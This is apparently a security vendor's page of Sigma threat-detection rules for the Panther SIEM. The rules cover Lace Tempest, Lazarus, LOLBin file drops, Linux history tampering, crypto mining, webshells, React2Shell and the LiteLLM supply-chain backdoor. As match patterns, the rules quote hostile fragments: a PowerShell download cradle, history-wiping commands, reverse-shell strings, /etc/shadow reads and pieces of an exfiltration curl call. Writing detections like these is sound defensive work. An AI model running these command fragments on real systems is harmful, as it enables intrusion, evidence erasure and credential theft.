SOAR
Panther
1,713 rules · Sigma detections in Panther syntax
The same Sigma detection corpus, machine-rendered into Panther query syntax and ready to paste. Switch platforms above for identical coverage in another language, or choose Sigma (generic) for the portable YAML.
Download all 3,742 rules (.zip, 1.7 MB)
Every Panther query in this view, packaged to deploy.
Filter by techniquepick techniques from the ATT&CK matrix
Reconnaissance12
Resource Development10
Initial Access10
Execution30
Persistence43
Privilege Escalation20
Stealth83
Defense Impairment32
Credential Access35
Discovery33
Lateral Movement16
Collection20
Command and Control24
Exfiltration10
Impact18
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
Judge. Each rule shows a quality tier (Strong / Moderate / Basic) and an estimated alert-volume tier (Low / Medium / High FP), both scored deterministically from the rule's shape - status, detection depth, match breadth, log source, documented false positives and references. A rule existing is not the same as a rule being good, or being quiet; hover either tier for the breakdown. The FP estimate reads rule shape, not a measured rate, so use it to pick what to tune first before you deploy.
◈
Detection rules
50 shown of 1,713
high
Moderate
High FP
Lace Tempest Cobalt Strike Download
Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team
view Sigma YAML
title: Lace Tempest Cobalt Strike Download
id: aa5b0a40-ed88-46aa-9fdc-0337b379ca9d
status: test
description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team
references:
- https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-11-09
tags:
- attack.execution
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(
- /a')
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Moderate
High FP
Lace Tempest File Indicators
Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7
view Sigma YAML
title: Lace Tempest File Indicators
id: e94486ea-2650-4548-bf25-88cbd0bb32d7
status: test
description: Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7
references:
- https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-11-09
tags:
- attack.execution
- detection.emerging-threats
logsource:
category: file_event
product: windows
detection:
selection:
- TargetFilename|endswith:
- ':\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe'
- ':\Program Files\SysAidServer\tomcat\webapps\usersfiles.war'
- ':\Program Files\SysAidServer\tomcat\webapps\leave'
- TargetFilename|contains: ':\Program Files\SysAidServer\tomcat\webapps\user.'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Moderate
High FP
Lace Tempest Malware Loader Execution
Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team
view Sigma YAML
title: Lace Tempest Malware Loader Execution
id: 745ea50b-9673-4ba7-9426-cb45cf4a8e6d
status: test
description: Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team
references:
- https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-11-09
tags:
- attack.execution
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_img:
Image|endswith: ':\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe'
selection_hash:
Hashes|contains: 'SHA256=B5ACF14CDAC40BE590318DEE95425D0746E85B1B7B1CBD14DA66F21F2522BF4D'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Moderate
High FP
Lace Tempest PowerShell Evidence Eraser
Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team
view Sigma YAML
title: Lace Tempest PowerShell Evidence Eraser
id: b377ddab-502d-4519-9e8c-5590033d2d70
status: test
description: |
Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team
references:
- https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-11-09
tags:
- attack.execution
- attack.t1059.001
- detection.emerging-threats
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'cleanLL'
- 'usersfiles.war'
- 'Remove-Item -Path "$tomcat_dir'
- 'SysAidServer'
- 'sleep '
- 'while(1)'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Moderate
High FP
Lace Tempest PowerShell Launcher
Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team
view Sigma YAML
title: Lace Tempest PowerShell Launcher
id: 37dc5463-f7e3-4f61-ad76-ba59cd02a651
status: test
description: |
Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team
references:
- https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-11-09
tags:
- attack.execution
- attack.t1059.001
- detection.emerging-threats
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- '\SysAidServer\tomcat\webapps'
- 'Starting user.exe'
- '\usersfiles\user.exe'
- 'Remove-Item -Force "$wapps'
- '(Sophos).'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Strong
Medium FP
Lazarus APT DLL Sideloading Activity
Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
view Sigma YAML
title: Lazarus APT DLL Sideloading Activity
id: 24007168-a26b-4049-90d0-ce138e13a5cf
status: test
description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
references:
- https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/
- https://www.bleepingcomputer.com/news/security/lazarus-hackers-breach-aerospace-firm-with-new-lightlesscan-malware/
author: Thurein Oo, Nasreddine Bencherchali (Nextron Systems)
date: 2023-10-18
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.stealth
- attack.t1574.001
- attack.g0032
- detection.emerging-threats
logsource:
product: windows
category: image_load
detection:
selection_mscoree:
Image: 'C:\ProgramShared\PresentationHost.exe'
ImageLoaded: ':\ProgramShared\mscoree.dll'
selection_colorui:
Image: 'C:\ProgramData\Adobe\colorcpl.exe'
ImageLoaded: 'C:\ProgramData\Adobe\colorui.dll'
selection_mapistub:
Image: 'C:\ProgramData\Oracle\Java\fixmapi.exe'
ImageLoaded: 'C:\ProgramData\Oracle\Java\mapistub.dll'
selection_hid:
Image: 'C:\ProgramData\Adobe\ARM\tabcal.exe'
ImageLoaded: 'C:\ProgramData\Adobe\ARM\HID.dll'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Moderate
Medium FP
Lazarus System Binary Masquerading
Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location
view Sigma YAML
title: Lazarus System Binary Masquerading
id: 3f7f5b0b-5b16-476c-a85f-ab477f6dd24b
status: test
description: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location
references:
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf
author: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)
date: 2020-06-03
modified: 2023-03-10
tags:
- attack.stealth
- attack.t1036.005
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\msdtc.exe'
- '\gpsvc.exe'
filter:
Image|startswith:
- 'C:\Windows\System32\'
- 'C:\Windows\SysWOW64\'
condition: selection and not filter
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Moderate
Medium FP
Legitimate Application Dropped Archive
Detects programs on a Windows system that should not write an archive to disk
view Sigma YAML
title: Legitimate Application Dropped Archive
id: 654fcc6d-840d-4844-9b07-2c3300e54a26
status: test
description: Detects programs on a Windows system that should not write an archive to disk
references:
- https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
author: frack113, Florian Roth
date: 2022-08-21
tags:
- attack.stealth
- attack.t1218
logsource:
product: windows
category: file_event
detection:
selection:
Image|endswith:
# Microsoft Office Programs Dropping Executables
- \winword.exe
- \excel.exe
- \powerpnt.exe
- \msaccess.exe
- \mspub.exe
- \eqnedt32.exe
- \visio.exe
- \wordpad.exe
- \wordview.exe
# LOLBINs that can be used to download executables
- \certutil.exe
- \certoc.exe
- \CertReq.exe
# - \bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env)
- \Desktopimgdownldr.exe
- \esentutl.exe
# - \expand.exe
- \finger.exe
# Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name)
- \notepad.exe
- \AcroRd32.exe
- \RdrCEF.exe
- \mshta.exe
- \hh.exe
TargetFilename|endswith:
- '.zip'
- '.rar'
- '.7z'
- '.diagcab'
- '.appx'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
Medium FP
Legitimate Application Dropped Executable
Detects programs on a Windows system that should not write executables to disk
view Sigma YAML
title: Legitimate Application Dropped Executable
id: f0540f7e-2db3-4432-b9e0-3965486744bc
status: test
description: Detects programs on a Windows system that should not write executables to disk
references:
- https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
author: frack113, Florian Roth (Nextron Systems)
date: 2022-08-21
modified: 2023-06-22
tags:
- attack.stealth
- attack.t1218
logsource:
product: windows
category: file_event
detection:
selection:
Image|endswith:
# Microsoft Office Programs Dropping Executables / Rest of the apps are covered in: c7a74c80-ba5a-486e-9974-ab9e682bc5e4
- '\eqnedt32.exe'
- '\wordpad.exe'
- '\wordview.exe'
# LOLBINs that can be used to download executables
- '\certutil.exe'
- '\certoc.exe'
- '\CertReq.exe'
# - \bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env)
- '\Desktopimgdownldr.exe'
- '\esentutl.exe'
# - \expand.exe
- '\mshta.exe'
# Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name)
- '\AcroRd32.exe'
- '\RdrCEF.exe'
- '\hh.exe'
- '\finger.exe'
TargetFilename|endswith:
- '.exe'
- '.dll'
- '.ocx'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
Medium FP
Legitimate Application Dropped Script
Detects programs on a Windows system that should not write scripts to disk
view Sigma YAML
title: Legitimate Application Dropped Script
id: 7d604714-e071-49ff-8726-edeb95a70679
status: test
description: Detects programs on a Windows system that should not write scripts to disk
references:
- https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
author: frack113, Florian Roth (Nextron Systems)
date: 2022-08-21
modified: 2023-06-22
tags:
- attack.stealth
- attack.t1218
logsource:
product: windows
category: file_event
detection:
selection:
Image|endswith:
# Microsoft Office Programs Dropping Executables / Rest of the apps are covered in: c7a74c80-ba5a-486e-9974-ab9e682bc5e4
- \eqnedt32.exe
- \wordpad.exe
- \wordview.exe
# LOLBINs that can be used to download executables
- \certutil.exe
- \certoc.exe
- \CertReq.exe
# - \bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env)
- \Desktopimgdownldr.exe
- \esentutl.exe
# - \expand.exe
- '\mshta.exe'
# Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name)
- '\AcroRd32.exe'
- '\RdrCEF.exe'
- '\hh.exe'
- '\finger.exe'
TargetFilename|endswith:
- '.ps1'
- '.bat'
- '.vbs'
- '.scf'
- '.wsf'
- '.wsh'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
Legitimate Application Writing Files In Uncommon Location
Detects legitimate applications writing any type of file to uncommon or suspicious locations that are not typical for application data storage or execution.
Adversaries may leverage legitimate applications (Living off the Land Binaries - LOLBins) to drop or download malicious files to uncommon locations on the system to evade detection by security solutions.
view Sigma YAML
title: Legitimate Application Writing Files In Uncommon Location
id: 1cf465a1-2609-4c15-9b66-c32dbe4bfd67
related:
- id: 2ddef153-167b-4e89-86b6-757a9e65dcac # bitsadmin dedicated rule
type: similar
status: experimental
description: |
Detects legitimate applications writing any type of file to uncommon or suspicious locations that are not typical for application data storage or execution.
Adversaries may leverage legitimate applications (Living off the Land Binaries - LOLBins) to drop or download malicious files to uncommon locations on the system to evade detection by security solutions.
references:
- https://lolbas-project.github.io/#/download
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-12-10
tags:
- attack.stealth
- attack.t1218
- attack.command-and-control
- attack.t1105
logsource:
product: windows
category: file_event
detection:
selection_img:
Image|endswith:
# Microsoft Office Programs Dropping Executables / Rest of the apps are covered in: c7a74c80-ba5a-486e-9974-ab9e682bc5e4
- '\eqnedt32.exe'
- '\wordpad.exe'
- '\wordview.exe'
# LOLBINs that can be used to download executables
- '\cmdl32.exe'
- '\certutil.exe'
- '\certoc.exe'
- '\CertReq.exe'
- '\bitsadmin.exe'
- '\Desktopimgdownldr.exe'
- '\esentutl.exe'
- '\expand.exe'
- '\extrac32.exe'
- '\replace.exe'
- '\mshta.exe'
- '\ftp.exe'
- '\Ldifde.exe'
- '\RdrCEF.exe'
- '\hh.exe'
- '\finger.exe'
- '\findstr.exe'
selection_locations:
TargetFilename|contains:
- ':\Perflogs'
- ':\ProgramData\'
- ':\Temp\'
- ':\Users\Public\'
- ':\Windows\'
- '\$Recycle.Bin\'
- '\AppData\Local\'
- '\AppData\Roaming\'
- '\Contacts\'
- '\Desktop\'
- '\Favorites\'
- '\Favourites\'
- '\inetpub\wwwroot\'
- '\Music\'
- '\Pictures\'
- '\Start Menu\Programs\Startup\'
- '\Users\Default\'
- '\Videos\'
condition: all of selection_*
falsepositives:
- Unknown
level: high
regression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location/info.yml
Convert to SIEM query
high
Moderate
High FP
Linux Command History Tampering
Detects commands that try to clear or tamper with the Linux command history.
This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as "bash_history" or "zsh_history".
view Sigma YAML
title: Linux Command History Tampering
id: fdc88d25-96fb-4b7c-9633-c0e417fdbd4e
status: test
description: |
Detects commands that try to clear or tamper with the Linux command history.
This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as "bash_history" or "zsh_history".
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md
- https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics
- https://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/
author: Patrick Bareiss
date: 2019-03-24
modified: 2024-04-17
tags:
- attack.stealth
- attack.t1070.003
logsource:
product: linux
detection:
keywords:
- 'cat /dev/null >*sh_history'
- 'cat /dev/zero >*sh_history'
- 'chattr +i*sh_history'
- 'echo "" >*sh_history'
- 'empty_bash_history'
- 'export HISTFILESIZE=0'
- 'history -c'
- 'history -w'
- 'ln -sf /dev/null *sh_history'
- 'ln -sf /dev/zero *sh_history'
- 'rm *sh_history'
- 'shopt -ou history'
- 'shopt -uo history'
- 'shred *sh_history'
- 'truncate -s0 *sh_history'
# - 'unset HISTFILE' # prone to false positives
condition: keywords
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
Linux Crypto Mining Indicators
Detects command line parameters or strings often used by crypto miners
view Sigma YAML
title: Linux Crypto Mining Indicators
id: 9069ea3c-b213-4c52-be13-86506a227ab1
status: test
description: Detects command line parameters or strings often used by crypto miners
references:
- https://www.poolwatch.io/coin/monero
author: Florian Roth (Nextron Systems)
date: 2021-10-26
modified: 2022-12-25
tags:
- attack.impact
- attack.t1496
logsource:
product: linux
category: process_creation
detection:
selection:
CommandLine|contains:
- ' --cpu-priority='
- '--donate-level=0'
- ' -o pool.'
- ' --nicehash'
- ' --algo=rx/0 '
- 'stratum+tcp://'
- 'stratum+udp://'
# Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives
- 'sh -c /sbin/modprobe msr allow_writes=on'
# base64 encoded: --donate-level=
- 'LS1kb25hdGUtbGV2ZWw9'
- '0tZG9uYXRlLWxldmVsP'
- 'tLWRvbmF0ZS1sZXZlbD'
# base64 encoded: stratum+tcp:// and stratum+udp://
- 'c3RyYXR1bSt0Y3A6Ly'
- 'N0cmF0dW0rdGNwOi8v'
- 'zdHJhdHVtK3RjcDovL'
- 'c3RyYXR1bSt1ZHA6Ly'
- 'N0cmF0dW0rdWRwOi8v'
- 'zdHJhdHVtK3VkcDovL'
condition: selection
falsepositives:
- Legitimate use of crypto miners
level: high
Convert to SIEM query
high
Strong
Medium FP
Linux Crypto Mining Pool Connections
Detects process connections to a Monero crypto mining pool
view Sigma YAML
title: Linux Crypto Mining Pool Connections
id: a46c93b7-55ed-4d27-a41b-c259456c4746
status: stable
description: Detects process connections to a Monero crypto mining pool
references:
- https://www.poolwatch.io/coin/monero
author: Florian Roth (Nextron Systems)
date: 2021-10-26
tags:
- attack.impact
- attack.t1496
logsource:
product: linux
category: network_connection
detection:
selection:
DestinationHostname:
- 'pool.minexmr.com'
- 'fr.minexmr.com'
- 'de.minexmr.com'
- 'sg.minexmr.com'
- 'ca.minexmr.com'
- 'us-west.minexmr.com'
- 'pool.supportxmr.com'
- 'mine.c3pool.com'
- 'xmr-eu1.nanopool.org'
- 'xmr-eu2.nanopool.org'
- 'xmr-us-east1.nanopool.org'
- 'xmr-us-west1.nanopool.org'
- 'xmr-asia1.nanopool.org'
- 'xmr-jp1.nanopool.org'
- 'xmr-au1.nanopool.org'
- 'xmr.2miners.com'
- 'xmr.hashcity.org'
- 'xmr.f2pool.com'
- 'xmrpool.eu'
- 'pool.hashvault.pro'
- 'moneroocean.stream'
- 'monerocean.stream'
condition: selection
falsepositives:
- Legitimate use of crypto miners
level: high
Convert to SIEM query
high
Strong
Medium FP
Linux HackTool Execution
Detects known hacktool execution based on image name.
view Sigma YAML
title: Linux HackTool Execution
id: a015e032-146d-4717-8944-7a1884122111
status: test
description: Detects known hacktool execution based on image name.
references:
- https://github.com/Gui774ume/ebpfkit
- https://github.com/pathtofile/bad-bpf
- https://github.com/carlospolop/PEASS-ng
- https://github.com/t3l3machus/hoaxshell
- https://github.com/t3l3machus/Villain
- https://github.com/HavocFramework/Havoc
- https://github.com/1N3/Sn1per
- https://github.com/Ne0nd0g/merlin
- https://github.com/Pennyw0rth/NetExec/
author: Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure])
date: 2023-01-03
modified: 2024-09-19
tags:
- attack.execution
- attack.resource-development
- attack.t1587
logsource:
product: linux
category: process_creation
detection:
selection_c2_frameworks:
Image|endswith:
- '/crackmapexec'
- '/havoc'
- '/merlin-agent'
- '/merlinServer-Linux-x64'
- '/msfconsole'
- '/msfvenom'
- '/ps-empire server'
- '/ps-empire'
- '/sliver-client'
- '/sliver-server'
- '/Villain.py'
selection_c2_framework_cobaltstrike:
Image|contains:
- '/cobaltstrike'
- '/teamserver'
selection_scanners:
Image|endswith:
- '/autorecon'
- '/httpx'
- '/legion'
- '/naabu'
- '/netdiscover'
- '/nuclei'
- '/recon-ng'
selection_scanners_sniper:
Image|contains: '/sniper'
selection_web_enum:
Image|endswith:
- '/dirb'
- '/dirbuster'
- '/eyewitness'
- '/feroxbuster'
- '/ffuf'
- '/gobuster'
- '/wfuzz'
- '/whatweb'
selection_web_vuln:
Image|endswith:
- '/joomscan'
- '/nikto'
- '/wpscan'
selection_exploit_tools:
Image|endswith:
- '/aircrack-ng'
- '/bloodhound-python'
- '/bpfdos'
- '/ebpfki'
- '/evil-winrm'
- '/hashcat'
- '/hoaxshell.py'
- '/hydra'
- '/john'
- '/ncrack'
# default binary: https://github.com/Pennyw0rth/NetExec/releases/download/v1.0.0/nxc-ubuntu-latest
- '/nxc-ubuntu-latest'
- '/pidhide'
- '/pspy32'
- '/pspy32s'
- '/pspy64'
- '/pspy64s'
- '/setoolkit'
- '/sqlmap'
- '/writeblocker'
selection_linpeas:
# covers: all linux versions listed here: https://github.com/carlospolop/PEASS-ng/releases
Image|contains: '/linpeas'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Strong
Low FP
Linux Keylogging with Pam.d
Detect attempt to enable auditing of TTY input
view Sigma YAML
title: Linux Keylogging with Pam.d
id: 49aae26c-450e-448b-911d-b3c13d178dfc
status: test
description: Detect attempt to enable auditing of TTY input
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md
- https://linux.die.net/man/8/pam_tty_audit
- https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing
- https://access.redhat.com/articles/4409591#audit-record-types-2
author: 'Pawel Mazur'
date: 2021-05-24
modified: 2022-12-18
tags:
- attack.collection
- attack.credential-access
- attack.t1003
- attack.t1056.001
logsource:
product: linux
service: auditd
detection:
selection_path_events:
type: PATH
name:
- '/etc/pam.d/system-auth'
- '/etc/pam.d/password-auth'
selection_tty_events:
type:
- 'TTY'
- 'USER_TTY'
condition: 1 of selection_*
falsepositives:
- Administrative work
level: high
Convert to SIEM query
high
Moderate
High FP
Linux Recon Indicators
Detects events with patterns found in commands used for reconnaissance on linux systems
view Sigma YAML
title: Linux Recon Indicators
id: 0cf7a157-8879-41a2-8f55-388dd23746b7
status: test
description: Detects events with patterns found in commands used for reconnaissance on linux systems
references:
- https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py
author: Florian Roth (Nextron Systems)
date: 2022-06-20
tags:
- attack.reconnaissance
- attack.t1592.004
- attack.credential-access
- attack.t1552.001
logsource:
category: process_creation
product: linux
detection:
selection:
CommandLine|contains:
- ' -name .htpasswd'
- ' -perm -4000 '
condition: selection
falsepositives:
- Legitimate administration activities
level: high
Convert to SIEM query
high
Moderate
Medium FP
Linux Suspicious Child Process from Node.js - React2Shell
Detects suspicious child processes spawned from Node.js server processes on Linux systems, potentially indicating remote code execution exploitation such as CVE-2025-55182 (React2Shell).
This rule particularly looks for exploitation of vulnerability on Node.js Servers where attackers abuse Node.js child_process module to execute arbitrary system commands.
When execSync() or exec() is used, the command line often includes a shell invocation followed by suspicious commands or scripts (e.g., /bin/sh -c <malicious-command>).
For other methods, the Image field will show the spawned process directly.
view Sigma YAML
title: Linux Suspicious Child Process from Node.js - React2Shell
id: c70834fa-fb9d-4aa0-9e7d-45ceed36f3f7
related:
- id: 271de298-cc0e-4842-acd8-079a0a99ea65
type: similar
status: experimental
description: |
Detects suspicious child processes spawned from Node.js server processes on Linux systems, potentially indicating remote code execution exploitation such as CVE-2025-55182 (React2Shell).
This rule particularly looks for exploitation of vulnerability on Node.js Servers where attackers abuse Node.js child_process module to execute arbitrary system commands.
When execSync() or exec() is used, the command line often includes a shell invocation followed by suspicious commands or scripts (e.g., /bin/sh -c <malicious-command>).
For other methods, the Image field will show the spawned process directly.
references:
- https://github.com/msanft/CVE-2025-55182
- https://nodejs.org/api/child_process.html#class-childprocess
- https://gist.github.com/swachchhanda000/a0228130f86a2dedfbcebb415b47f870
- https://github.com/nasbench/Misc-Research/blob/2f651ede832ab34027a7ba005b63bb78f1ade378/Other/React-Next-Child-Processes-Notes.md
author: Swachchhanda Shrawan Poudel (Nextron Systems), Nasreddine Bencherchali
date: 2025-12-05
tags:
- attack.execution
- attack.t1059
- attack.initial-access
- attack.t1190
- detection.emerging-threats
- cve.2025-55182
logsource:
category: process_creation
product: linux
detection:
selection_parent:
ParentImage|endswith: '/node'
ParentCommandLine|contains:
- '--experimental-https'
- '--experimental-next-config-strip-types'
- '/node_modules/next'
- 'next dev'
- 'next start'
- 'node_modules/.bin'
- 'react-scripts start'
- 'start-server.js'
selection_generic_child_img:
# Observed when child_process.spawn(), child_process.exec(), child_process.execFile(), or child_process.fork() method is used to spawn suspicious processes in exploit
- Image|endswith:
- '/busybox'
- '/cat'
- '/curl'
- '/dash'
- '/dig'
- '/head'
- '/id'
- '/ifconfig'
- '/ip'
- '/java'
- '/less'
- '/lua'
- '/more'
- '/nc'
- '/ncat'
- '/netcat'
- '/netstat'
- '/nslookup'
- '/perl'
- '/ping'
- '/python'
- '/python2'
- '/ruby'
- '/socat'
- '/tail'
- '/wget'
- '/whoami'
- Image|contains: '/python'
selection_generic_child_cli:
# Observed when child_process.execSync() is used to spawn suspicious processes
# Reference: https://nodejs.org/api/child_process.html#child_processexecsynccommand-options
# By default, the cli will look something like `/bin/sh -c .......`
CommandLine|contains:
- '/dev/tcp/'
- '/dev/udp/'
- '/etc/hosts'
- '/etc/passwd'
- '/etc/shadow'
- 'base64'
- 'cat '
- 'curl'
- 'dig'
- 'ifconfig'
- 'IO::Socket::INET'
- 'java'
- 'less '
- 'lua'
- 'mkfifo '
- 'more'
- 'nc '
- 'ncat'
- 'netcat'
- 'netstat'
- 'nslookup'
- 'perl'
- 'php'
- 'ping'
- 'ps -ef'
- 'ps aux'
- 'python'
- 'rcat'
- 'ruby'
- 'sh -i 2>&1'
- '-c id'
- 'socat'
- 'uname'
- 'wget'
- 'whoami'
selection_specific_sh:
Image|endswith: '/sh'
selection_specific_cli:
Image|endswith: '-c'
filter_main_default_shell_flag:
Image|endswith: '-c'
condition:
selection_parent and
(
1 of selection_generic_*
or
(selection_specific_sh and not filter_main_default_shell_flag)
or
(all of selection_specific_* and selection_generic_child_cli)
)
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Strong
Medium FP
Linux Webshell Indicators
Detects suspicious sub processes of web server processes
view Sigma YAML
title: Linux Webshell Indicators
id: 818f7b24-0fba-4c49-a073-8b755573b9c7
status: test
description: Detects suspicious sub processes of web server processes
references:
- https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/
- https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2021-10-15
modified: 2022-12-28
tags:
- attack.persistence
- attack.t1505.003
logsource:
product: linux
category: process_creation
detection:
selection_general:
ParentImage|endswith:
- '/httpd'
- '/lighttpd'
- '/nginx'
- '/apache2'
- '/node'
- '/caddy'
selection_tomcat:
ParentCommandLine|contains|all:
- '/bin/java'
- 'tomcat'
selection_websphere: # ? just guessing
ParentCommandLine|contains|all:
- '/bin/java'
- 'websphere'
sub_processes:
Image|endswith:
- '/whoami'
- '/ifconfig'
- '/ip'
- '/bin/uname'
- '/bin/cat'
- '/bin/crontab'
- '/hostname'
- '/iptables'
- '/netstat'
- '/pwd'
- '/route'
condition: 1 of selection_* and sub_processes
falsepositives:
- Web applications that invoke Linux command line tools
level: high
Convert to SIEM query
high
Moderate
Medium FP
LiteLLM / TeamPCP Supply Chain Attack Indicators
Detects process executions related to the backdoored versions of LiteLLM (v1.82.7 or v1.82.8).
In March 2026, a supply chain attack was discovered involving the popular open-source LLM framework LiteLLM by Threat Actor TeamPCP.
The malicious package harvests every credential on the system, encrypts and exfiltrates them, and installs a persistent C2 backdoor.
view Sigma YAML
title: LiteLLM / TeamPCP Supply Chain Attack Indicators
id: 36603778-030c-43c4-8cbb-cd3c1d1a80c7
status: experimental
description: |
Detects process executions related to the backdoored versions of LiteLLM (v1.82.7 or v1.82.8).
In March 2026, a supply chain attack was discovered involving the popular open-source LLM framework LiteLLM by Threat Actor TeamPCP.
The malicious package harvests every credential on the system, encrypts and exfiltrates them, and installs a persistent C2 backdoor.
references:
- https://novasky.io/hunts/hunting-litellm-supply-chain
- https://www.virustotal.com/gui/file/71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238/
- https://huskyhacks.io/posts/litellm-cred-stealer/
- https://www.wiz.io/blog/threes-a-crowd-teampcp-trojanizes-litellm-in-continuation-of-campaign
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-03-30
tags:
- attack.initial-access
- attack.t1195.002
- attack.collection
- attack.t1560.001
- attack.persistence
- attack.privilege-escalation
- attack.t1543.002
- detection.emerging-threats
logsource:
category: process_creation
product: linux
detection:
selection_pth_package:
# Execution of .pth file
Image|contains: '/python3'
CommandLine|contains|all:
- "exec(base64.b64decode('aW1wb3J0"
- "kI2NF9TQ1JJUFQgPSAiYV"
selection_tar:
Image|endswith: '/tar'
CommandLine|contains|all:
- 'tpcp.tar.gz'
- 'payload.enc'
- 'session.key.enc'
selection_curl:
Image|endswith: '/curl'
CommandLine|contains|all:
- 'models.litellm.cloud'
- 'X-Filename: tpcp.tar.gz'
selection_sysmon_service:
ParentImage|contains: '/python3'
CommandLine|contains|all:
- 'systemctl'
- '--user'
- 'sysmon'
condition: 1 of selection_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
